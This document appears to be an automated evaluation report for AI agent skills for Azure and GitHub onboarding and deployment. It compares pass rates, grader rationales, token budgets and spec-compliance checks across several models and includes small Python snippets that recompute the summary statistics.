🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.77 | Duration: 2m5.322s

  • Tests: 4 total, 3 passed, 1 failed, 0 errors
  • Success Rate: 75.0%
  • Score Range: 0.57 - 1.00 (σ=0.1839)

Task Results

| Task | Score | Status | Graders |
|---|---|---|---|
| Negative — Editing an ARM template | 0.57 | | budget, trigger_relevance_negative |
| Negative — Azure service concept question | 0.60 | | budget, trigger_relevance_negative |
| Positive — "command not found" failure | 1.00 | | answer_quality, budget, trigger_relevance_positive |
| Positive — "What do I need to install?" | 0.89 | | answer_quality, budget, trigger_relevance_positive |

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — "What do I need to install?": 67% pass rate, score=0.89±0.16

Failed Task Details

Positive — "What do I need to install?"

Run 1/3 (failed):

  • answer_quality (0.00): fail: Criterion 4 not met: the response lists the tools and auth commands and minimum versions, but does not provide install commands (e.g., brew/apt/winget) and does not point the user to a verification script or prereq-check skill invocation. Criteria 1, 2, and 3 are satisfied.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)

Benchmark: prereq-check-eval | Skill: prereq-check | Model: gpt-5.4

Results saved to: .waza-results/prereq-check-gpt-5.4.json

🔢 Tokens (count + profile)

📊 prereq-check: 2,138 tokens (detailed ✓), 10 sections, 2 code blocks
   ⚠️  token count 2138 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            █████  Purpose is immediately obvious, the Quick Reference table is an excellent at-a-glance aid, steps are logically ordered with clear section anchors, and the exact verdict strings (READY / TOOLS MISSING / REPORTED MISSING / AUTH MISSING) eliminate ambiguity in outputs.
completeness       ████░  Error handling covers the most important failure modes well; however, there is no fallback for when the referenced external scripts (check-tools.sh, check-tools.ps1) are absent or not executable — the skill should specify inline commands to run in that case rather than silently depending on files that may not exist.
trigger_precision  ████░  USE FOR is exceptionally detailed with concrete error-message literals, which aids accurate routing; DO NOT USE FOR is too terse ('Anything else') and could be sharpened by explicitly listing one or two adjacent intents to reject (e.g., 'do not use for Azure subscription validation or GitHub repo setup').
scope_coverage     █████  Boundaries are explicitly stated in multiple places (Quick Reference side-effects row, Constraints Always/Never list, Rules), related skills are called out, and the read-only constraint is enforced consistently throughout — scope is tight and well-defended.
anti_patterns      ████░  No conflicting directives or vague instructions; however, the Constraints 'Always' list includes 'Verify with command -v <tool> + <tool> --version after suggested fixes,' which implies the skill re-runs checks post-fix — contradicting the read-only, single-pass design and potentially confusing the agent about whether it should loop.
────────────────────────────────────────────
Overall: 4.4/5.0

A high-quality, production-ready skill document. It is notably strong in clarity and scope definition, with explicit verdict strings, a well-structured Quick Reference, and a thorough Always/Never constraints section. Two actionable improvements: add an inline fallback for missing check scripts, and tighten the DO NOT USE FOR trigger to list at least one concrete adjacent intent to reject.
✅ Check (compliance summary)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/prereq-check/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: prereq-check

📋 Compliance Score: Medium-High
   ⚠️  Good, but could be improved. Missing routing clarity.

   Issues found:
   ❌  SKILL.md is 2138 tokens (hard limit 500)

📐 Spec Compliance: 8/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility

📎 Links: 4/4 valid
   ✅  All links valid.

📊 Token Budget: 2138 / 500 tokens
   ❌  Exceeds limit by 1638 tokens. Consider reducing content.

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  4 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 1 reference module(s)
   ❌  [complexity] Complexity: comprehensive (2138 tokens, 1 modules)
   ✅  [negative-delta-risk] No negative delta risk patterns detected
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ❌  [cross-model-density] Advisory 16: word count is 122 (>60 may reduce cross-model effectiveness)
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 8 signal(s) detected (8 level-2 heading(s), 2 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
2. Run 'waza dev' for interactive compliance improvement
3. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
4. Reduce SKILL.md by 1638 tokens. Run 'waza tokens suggest' for optimization tips

Skill: git-ape-onboarding

📈 Score (per model) + Suggestions/Recommendations
Model: claude-opus-4.6

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: claude-opus-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Storage service comparison (off-topic)
[ERROR] session error: You've hit your rate limit. Please wait for your limit to reset in under a minute or switch to auto model to continue. Learn More (https://docs.github.com/copilot/concepts/rate-limits). (Request ID: 4433:3F3797:3C1AB5:3F25DF:6A2684DE)

✗ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding
✗ [2/4] Positive — First-time repo setup

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.60 | Duration: 59.301s

  • Tests: 4 total, 1 passed, 3 failed, 0 errors
  • Success Rate: 25.0%
  • Score Range: 0.56 - 0.65 (σ=0.0340)

Task Results

| Task | Score | Status | Graders |
| --- | --- | --- | --- |
| Negative — Storage service comparison (off-topic) | 0.56 | ✓ | budget, trigger_relevance_negative |
| Positive — First-time repo setup | 0.60 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Multi-environment onboarding | 0.58 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Scaffold honors skip-with-notice on collision | 0.65 | ✗ | answer_quality, budget, trigger_relevance_positive |
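
The summary figures for this run can be reproduced approximately from the per-task scores. The sketch below is not waza's implementation: it assumes the overall score is an unweighted mean of task scores and that σ is a population standard deviation. The task labels and the `summarize` helper are hypothetical. Because the inputs are the rounded scores printed in the log, σ lands near the reported 0.0340 rather than matching it exactly.

```python
from statistics import mean, pstdev

# (score, passed) per task, copied from the claude-opus-4.6 run.
# Short labels are illustrative stand-ins for the full task names.
task_results = {
    "storage-comparison (negative)": (0.56, True),
    "first-time-setup (positive)": (0.60, False),
    "multi-environment (positive)": (0.58, False),
    "skip-on-collision (positive)": (0.65, False),
}


def summarize(results):
    """Return (mean score, success rate in percent, population std dev)."""
    scores = [score for score, _ in results.values()]
    passed = sum(1 for _, ok in results.values() if ok)
    return mean(scores), 100.0 * passed / len(scores), pstdev(scores)


overall, success_rate, sigma = summarize(task_results)
print(f"Score: {overall:.2f} | Success Rate: {success_rate:.1f}% | sigma: {sigma:.4f}")
```

A sample standard deviation (`statistics.stdev`) gives a noticeably larger value for these four scores, which is why the population form is assumed here.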

Failed Task Details

Positive — First-time repo setup

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq results and explicit auth-gate surfacing: Criterion 1 NOT met: No prereq check results presented. The agent attempted to run check-tools.sh and several bash probes, but every shell call returned "unexpected user permission response". No tool versions, no status table, no inspection output of any kind was shown — the agent never proved it inspected the environment. Criterion 2 NOT met: The blocking gate the agent surfaced was "I cannot execute shell commands" (sandbox permission), not the expected auth/prereq gate (e.g. "az not authenticated", "az login required", ❌ on Azure auth row). There is no explicit auth status or tool-missing marker. Criterion 3 MET: The agent requested 4 inputs (GitHub repo URL, Azure subscription ID, RBAC role, onboarding mode). Criterion 4 MET: The agent made no false claims of having configured OIDC, federated credentials, RBAC, environments, or scaffolded files; it explicitly waits for inputs and access.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Positive — Multi-environment onboarding

Run 1/1 (failed):

  • answer_quality (0.00): fail: Response skipped prereq gating: Criterion 1 missing: No prereq check results / tool & auth status table — the response only listed prerequisites as assumptions ("You have Owner...", "az and gh are authenticated") without actually inspecting the local environment (no az account show, gh auth status, version checks, etc.).

Criterion 2 missing: No auth/prereq gate was surfaced. The agent did not verify whether az/gh were authenticated or block on missing auth; it proceeded straight to walkthrough steps.

Criterion 3 met: The agent requested 3 inputs at the end (org/repo, staging subscription ID, RBAC role).

Criterion 4 met: Multi-environment awareness is shown — explicitly names azure-deploy-staging environment, creates a separate federated credential entry for it, and discusses per-environment secrets/variables scoping subscription IDs.

Fails on criteria 1 and 2 (no prereq inspection, no explicit auth gate).

  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.73): Prompt is trigger-aligned (score 0.73 >= 0.50)

Positive — Scaffold honors skip-with-notice on collision

Run 1/1 (error):

  • answer_quality (0.00): fail: No prior assistant response to grade: There is no previous assistant response in the session to evaluate. None of the four criteria (skip-on-collision, notice surfaced, diff/backup recommendation, opt-in overwrite guidance) can be assessed because no answer was produced.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.94): Prompt is trigger-aligned (score 0.94 >= 0.50)
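
The log does not state how a task score is derived from its graders. The three failed tasks above are consistent with an unweighted mean of the grader scores, so the following sketch uses that as an explicit assumption; `task_score` is a hypothetical helper, not a waza API.

```python
from statistics import mean


def task_score(grader_scores):
    """Unweighted mean of grader scores (assumed aggregation, not confirmed)."""
    return mean(grader_scores.values())


# Grader scores copied from the failed-task details of the claude-opus-4.6 run.
first_time_setup = {"answer_quality": 0.00, "budget": 1.00, "trigger_relevance_positive": 0.81}
multi_environment = {"answer_quality": 0.00, "budget": 1.00, "trigger_relevance_positive": 0.73}
skip_on_collision = {"answer_quality": 0.00, "budget": 1.00, "trigger_relevance_positive": 0.94}

for label, graders in [
    ("first-time setup", first_time_setup),
    ("multi-environment", multi_environment),
    ("skip-on-collision", skip_on_collision),
]:
    print(f"{label}: {task_score(graders):.2f}")
```

Under this reading, a task with a failed `answer_quality` grader still scores around 0.6 because `budget` and trigger relevance pull the mean up, so the task score alone does not indicate pass or fail.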

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: claude-opus-4.6

Results saved to: .waza-results/git-ape-onboarding-claude-opus-4.6.json

Model: claude-sonnet-4.6

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Storage service comparison (off-topic)
✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✓ [3/4] Positive — Multi-environment onboarding
✗ [2/4] Positive — First-time repo setup

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.76 | Duration: 1m30.527s

  • Tests: 4 total, 3 passed, 1 failed, 0 errors
  • Success Rate: 75.0%
  • Score Range: 0.56 - 0.98 (σ=0.1857)

Task Results

| Task | Score | Status | Graders |
| --- | --- | --- | --- |
| Negative — Storage service comparison (off-topic) | 0.56 | ✓ | budget, trigger_relevance_negative |
| Positive — First-time repo setup | 0.60 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Multi-environment onboarding | 0.91 | ✓ | answer_quality, budget, trigger_relevance_positive |
| Positive — Scaffold honors skip-with-notice on collision | 0.98 | ✓ | answer_quality, budget, trigger_relevance_positive |

Failed Task Details

Positive — First-time repo setup

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq results presentation: Criterion 1 not met: No prereq check results table or list of tool versions (az, gh, jq, git) was presented. The agent attempted to run check-tools.sh and version commands but all bash/view tool calls failed with "unexpected user permission response", and the agent did not produce any substitute status table or version list proving environment inspection. Criterion 2 partially met but not via an Azure CLI auth status row — the agent surfaced a generic "sandboxed environment" blocker rather than an explicit Azure/GitHub auth gate. Criteria 3 (requested 5 inputs: repo URL, subscription ID, RBAC role, mode, OS/shell) and 4 (made no false configuration claims; explicitly waited for user input) are satisfied.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: claude-sonnet-4.6

Results saved to: .waza-results/git-ape-onboarding-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Storage service comparison (off-topic)
✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding
[ERROR] waiting for session.idle: context deadline exceeded

✗ [2/4] Positive — First-time repo setup

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.68 | Duration: 3m16.422s

  • Tests: 4 total, 2 passed, 2 failed, 0 errors
  • Success Rate: 50.0%
  • Score Range: 0.56 - 0.98 (σ=0.1748)

Task Results

| Task | Score | Status | Graders |
| --- | --- | --- | --- |
| Negative — Storage service comparison (off-topic) | 0.56 | ✓ | budget, trigger_relevance_negative |
| Positive — First-time repo setup | 0.60 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Multi-environment onboarding | 0.58 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Scaffold honors skip-with-notice on collision | 0.98 | ✓ | answer_quality, budget, trigger_relevance_positive |

Failed Task Details

Positive — First-time repo setup

Run 1/1 (error):

  • answer_quality (0.00): fail: Response did not present a gated step-1 reply: Criterion 1 FAIL: No prereq check results were presented — the bash command returned "unexpected user permission response" and the assistant did not produce a tool/auth status table or list. Criterion 2 FAIL: No auth gate was surfaced (no Azure/GitHub auth status shown, no ❌ marker, no "az login required" message). Criterion 3 FAIL: The assistant did not request any of the required inputs (target repo, subscription ID, RBAC role, region, project name, mode) — it only said it would "collect" them later. Criterion 4 PASS: The assistant did not falsely claim to have configured OIDC, federated credentials, environments, or scaffolded files. Overall: the reply is a tool-invocation stub rather than the expected gated handoff that presents prereq results and solicits the required onboarding inputs.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Positive — Multi-environment onboarding

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq execution and input gathering: Criteria 1 and 2 are not met: the assistant did not actually run or present prereq check results (no tool/auth status output, no inspection of az/gh/jq versions or auth state), and therefore did not surface the auth/prereq gate either — it merely instructed the user to run /prereq-check themselves. Criterion 3 is also not met: the assistant did not request the required inputs (e.g., target repo URL, staging subscription ID, RBAC role, App Registration reuse decision, environment name confirmation, onboarding mode) before proceeding — instead it presented a complete set of executable commands with placeholders. Criterion 4 IS met: the response mentions creating a new federated credential fc-azure-deploy-staging, references the azure-deploy-staging environment name, and discusses per-environment scoping of secrets/RBAC to the staging subscription.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.73): Prompt is trigger-aligned (score 0.73 >= 0.50)

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: gpt-5.3-codex

Results saved to: .waza-results/git-ape-onboarding-gpt-5.3-codex.json

Model: gpt-5.4 *(baseline — A/B mode)*

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: gpt-5.4
Judge Model: claude-opus-4.7
Parallel: 4 workers

════════════════════════════════════════════════════════════════
PASS 1: Skills-Enabled Run
════════════════════════════════════════════════════════════════
✓ [1/4] Negative — Storage service comparison (off-topic)
✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding
✗ [2/4] Positive — First-time repo setup

════════════════════════════════════════════════════════════════
PASS 2: Skills Baseline (skills stripped)
════════════════════════════════════════════════════════════════
✓ [1/4] Negative — Storage service comparison (off-topic)
✗ [2/4] Positive — First-time repo setup
✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding

════════════════════════════════════════════════════════════════
SKILL IMPACT ANALYSIS
════════════════════════════════════════════════════════════════
Overall Performance Delta:
With Skills: 50.0% (2/4 tasks passed)
Without Skills: 50.0% (2/4 tasks passed)
Impact: no change

Per-Task Breakdown:
• Negative — Storage service comparison (off-topic) [NEUTRAL] 100% → 100% (+0pp)
• Positive — First-time repo setup [NEUTRAL] 0% → 0% (+0pp)
• Positive — Multi-environment onboarding [NEUTRAL] 0% → 0% (+0pp)
• Positive — Scaffold honors skip-with-notice on collision [NEUTRAL] 100% → 100% (+0pp)

Verdict: Skills have NEUTRAL IMPACT (no net change)
════════════════════════════════════════════════════════════════
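
The per-task breakdown above is a difference of pass rates expressed in percentage points. The sketch below recomputes it from the two passes. The `impact` helper is hypothetical, and only the NEUTRAL label appears in the log, so the POSITIVE and NEGATIVE labels are assumptions.

```python
def impact(with_skills, without_skills):
    """Return {task: (delta in percentage points, label)} for two passes."""
    breakdown = {}
    for task, rate_with in with_skills.items():
        delta_pp = round((rate_with - without_skills[task]) * 100)
        if delta_pp > 0:
            label = "POSITIVE"   # assumed label, not shown in the log
        elif delta_pp < 0:
            label = "NEGATIVE"   # assumed label, not shown in the log
        else:
            label = "NEUTRAL"
        breakdown[task] = (delta_pp, label)
    return breakdown


# Pass rates per task (1.0 = passed, 0.0 = failed), copied from the gpt-5.4 A/B run.
with_skills = {"storage-comparison": 1.0, "first-time-setup": 0.0,
               "multi-environment": 0.0, "skip-on-collision": 1.0}
without_skills = dict(with_skills)  # the baseline pass produced identical outcomes

breakdown = impact(with_skills, without_skills)
overall_with = 100 * sum(with_skills.values()) / len(with_skills)
overall_without = 100 * sum(without_skills.values()) / len(without_skills)
print(overall_with, overall_without, breakdown)
```

With a single run per task, each pass rate is either 0% or 100%, so a neutral verdict here only says that the same tasks passed and failed in both passes.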

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.68 | Duration: 1m27.038s

  • Tests: 4 total, 2 passed, 2 failed, 0 errors
  • Success Rate: 50.0%
  • Score Range: 0.56 - 0.98 (σ=0.1748)

Task Results

| Task | Score | Status | Graders |
| --- | --- | --- | --- |
| Negative — Storage service comparison (off-topic) | 0.56 | ✓ | budget, trigger_relevance_negative |
| Positive — First-time repo setup | 0.60 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Multi-environment onboarding | 0.58 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Scaffold honors skip-with-notice on collision | 0.98 | ✓ | answer_quality, budget, trigger_relevance_positive |

Failed Task Details

Positive — First-time repo setup

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq results: Criterion 1 not met: the response does not present any prereq check results — no table/list of az/gh/jq/git versions and no Azure or GitHub auth status. The agent reported "UNABLE TO EXECUTE" because the shell was blocked, but never produced the inspection output the gate requires. Criterion 2 is also not satisfied in the expected form: there is no explicit ❌ on an Azure auth row or "az login required" message tied to a prereq check; only a generic runtime-permission failure. Criteria 3 (asks for repo URL, subscription IDs/roles, compliance framework, policy mode, confirmation — ≥3 inputs) and 4 (no fabricated claims of configuring OIDC/RBAC/environments/scaffolding) are met.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Positive — Multi-environment onboarding

Run 1/1 (failed):

  • answer_quality (0.00): fail: Response skipped the prereq gate and proceeded straight to a 10-step playbook without gathering required inputs: Criterion 1 missing: no prereq check results / tool / auth inspection was presented; the response only tells the user to "Run /prereq-check" without showing any output or inspecting the local env. Criterion 2 missing: no explicit auth/prereq gate is surfaced (no statement that az/gh are or aren't authenticated). Criterion 3 missing: the agent does not request inputs before proceeding: there are no numbered questions or input block; staging subscription ID, repo, RBAC role, and app-reuse decision all appear as placeholders inside an executable playbook rather than as gating questions. Criterion 4 satisfied: the response explicitly names the azure-deploy-staging environment, describes a new fc-azure-deploy-staging federated credential, and discusses per-environment secrets/variables and staging-subscription RBAC scoping. Overall: only 1 of 4 criteria met (criterion 4).
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.73): Prompt is trigger-aligned (score 0.73 >= 0.50)

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: gpt-5.4

Results saved to: .waza-results/git-ape-onboarding-gpt-5.4.json

🔢 Tokens (count + profile)

📊 git-ape-onboarding: 3,101 tokens (detailed ✓), 17 sections, 15 code blocks
   ⚠️  token count 3101 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            ████░  The skill is well-structured with numbered playbook steps, concrete CLI examples, an Invariants block, and a Suggested Agent Flow summary. Minor deduction: the 'Create or reuse' wording in Step 3 is not backed by code for the reuse path, leaving the agent to improvise for an existing app registration.
completeness       ████░  Edge cases (org OIDC subject override, disabled subscriptions) are explicitly handled with detection commands and fix instructions. Missing: no rollback guidance if onboarding fails mid-way (e.g., RBAC assigned but secrets not set), and no de-onboarding/teardown procedure.
trigger_precision  ███░░  The 'When to Use' section lists four valid scenarios clearly, but there is no 'DO NOT USE FOR' section — the skill gives no signal to route away from it (e.g., re-onboarding an already-configured repo, or subscription-only RBAC changes without a repo). This risks misuse for partial reconfiguration tasks.
scope_coverage     ████░  The 'What It Configures' list and Safe-Execution Rules together establish clear boundaries. However, limitations are implicit rather than explicit — there is no statement about what the skill deliberately does NOT do (e.g., it won't create the subscription, won't manage Azure Policy assignments, won't handle private GitHub Enterprise endpoints).
anti_patterns      ████░  The Invariants block proactively prevents the classic main/master substitution bug, and safe-execution rule #3 guards against secret leakage. One anti-pattern remains: Step 9 references templates at './templates/' with a relative path that only resolves correctly if the agent's working directory is the skill root — this should use an explicit, anchored path or a clear resolution instruction.
────────────────────────────────────────────
Overall: 3.8/5.0

A high-quality, production-oriented skill with strong invariant enforcement, concrete CLI playbooks, and meaningful edge-case coverage. The main gaps are the absence of a DO NOT USE FOR trigger section (hurting routing precision), missing rollback guidance for partial failures, and the implicit rather than explicit limitations boundary. Addressing those three points would push this to a 4.5+.
✅ Check (compliance summary)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/git-ape-onboarding/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: git-ape-onboarding

📋 Compliance Score: Medium
   ⚠️  Needs improvement. Missing anti-triggers and routing clarity.

   Issues found:
   ❌  SKILL.md is 3101 tokens (hard limit 500)

📐 Spec Compliance: 8/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility

📎 Links: 2/5 valid
   ⚠️  3 link issue(s) found.
   ❌  [templates/copilot-instructions.md] → .github/skills/azure-stack-deploy/SKILL.md: target does not exist
   ❌  [templates/copilot-instructions.md] → website/docs/deployment/state.md: target does not exist
   ❌  [templates/copilot-instructions.md] → .github/skills/azure-stack-destroy/SKILL.md: target does not exist

📊 Token Budget: 3101 / 500 tokens
   ❌  Exceeds limit by 2601 tokens. Consider reducing content.
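
The overage figures in these readiness checks are the token count minus the 500-token hard limit. A minimal sketch of that arithmetic follows; `token_overage` is a hypothetical helper, and the 500 default is taken from the "hard limit 500" lines in the log.

```python
def token_overage(token_count, limit=500):
    """Tokens that must be removed to meet the limit (0 if already within it)."""
    return max(0, token_count - limit)


# Token counts reported for SKILL.md files in the checks on this page.
for tokens in (3101, 1912, 2138):
    print(f"{tokens} tokens -> reduce by {token_overage(tokens)}")
```

The separate "token count exceeds 1000" warning in the Tokens section uses a different threshold, which would correspond to calling the helper with `limit=1000`.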

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  4 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 0 reference module(s)
   ❌  [complexity] Complexity: comprehensive (3101 tokens, 0 modules)
   ❌  [negative-delta-risk] Negative delta risk patterns detected: excessive constraints (12 constraint keywords found)
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ✅  [cross-model-density] Advisory 16: first sentence doesn't lead with action verb (reduces clarity)
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found; no error handling or troubleshooting section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 10 signal(s) detected (10 level-2 heading(s), 5 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add a 'DO NOT USE FOR:' section to clarify when NOT to use this skill
2. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
3. Run 'waza dev' for interactive compliance improvement
4. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
5. Fix 3 broken link(s) — targets do not exist
6. Reduce SKILL.md by 2601 tokens. Run 'waza tokens suggest' for optimization tips

Skill: azure-stack-deploy

📈 Score (per model) + Suggestions/Recommendations
Model: claude-sonnet-4.6

Running benchmark: azure-stack-deploy-eval
Skill: azure-stack-deploy
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [5/5] Positive — Re-deploy after template edit
✓ [2/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [3/5] Negative — What-if preview / preflight validation
✗ [1/5] Negative — Destroying / tearing down an existing deployment
✗ [4/5] Positive — Local deploy of an existing deployment artifact

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.78 | Duration: 2m28.072s

  • Tests: 5 total, 2 passed, 3 failed, 0 errors
  • Success Rate: 40.0%
  • Score Range: 0.60 - 0.86 (σ=0.0946)

Task Results

| Task | Score | Status | Graders |
| --- | --- | --- | --- |
| Negative — Destroying / tearing down an existing deployment | 0.86 | ✗ | budget, trigger_relevance_negative |
| Negative — Off-topic prompt (Linux kernel scheduling) | 0.60 | ✓ | budget, trigger_relevance_negative |
| Negative — What-if preview / preflight validation | 0.82 | ✗ | budget, trigger_relevance_negative |
| Positive — Local deploy of an existing deployment artifact | 0.78 | ✗ | answer_quality, budget, trigger_relevance_positive |
| Positive — Re-deploy after template edit | 0.85 | ✓ | answer_quality, budget, trigger_relevance_positive |

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — Local deploy of an existing deployment artifact: 50% pass rate, score=0.78±0.17
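
A task is reported as flaky when repeated runs disagree. The sketch below assumes the criterion is simply a pass rate strictly between 0% and 100%; the log does not document the exact rule, and both helper names are hypothetical.

```python
def pass_rate(run_outcomes):
    """Fraction of runs that passed; run_outcomes is a list of booleans."""
    return sum(run_outcomes) / len(run_outcomes)


def is_flaky(run_outcomes):
    """Assumed rule: flaky when some, but not all, runs passed."""
    return 0.0 < pass_rate(run_outcomes) < 1.0


# Two runs of the local-deploy task: one passed, one failed (50% pass rate).
local_deploy_runs = [True, False]
# A task that fails on every run is consistently failing, not flaky.
teardown_negative_runs = [False, False]

print(is_flaky(local_deploy_runs), is_flaky(teardown_negative_runs))
```

This matches the log in that the two negative tasks, which failed on both runs, are listed under failures but not under flaky tasks.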

Failed Task Details

Negative — Destroying / tearing down an existing deployment

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Negative — What-if preview / preflight validation

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)
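
The trigger-relevance messages imply a single 0.50 threshold that is read in opposite directions for positive and negative tasks. The sketch below illustrates that reading. The threshold comes from the log messages, while the function name and signature are hypothetical.

```python
TRIGGER_THRESHOLD = 0.50  # taken from the ">= 0.50" text in the grader messages


def trigger_grader_passes(score, expect_trigger):
    """Positive tasks pass when the prompt is trigger-aligned; negative tasks pass when it is not."""
    aligned = score >= TRIGGER_THRESHOLD
    return aligned if expect_trigger else not aligned


# Negative task: teardown prompt scored 0.71 against the deploy skill, so it fails.
print(trigger_grader_passes(0.71, expect_trigger=False))
# Negative task: what-if prompt scored 0.65, so it also fails.
print(trigger_grader_passes(0.65, expect_trigger=False))
# Positive task: local deploy prompt scored 0.83, so it passes.
print(trigger_grader_passes(0.83, expect_trigger=True))
```

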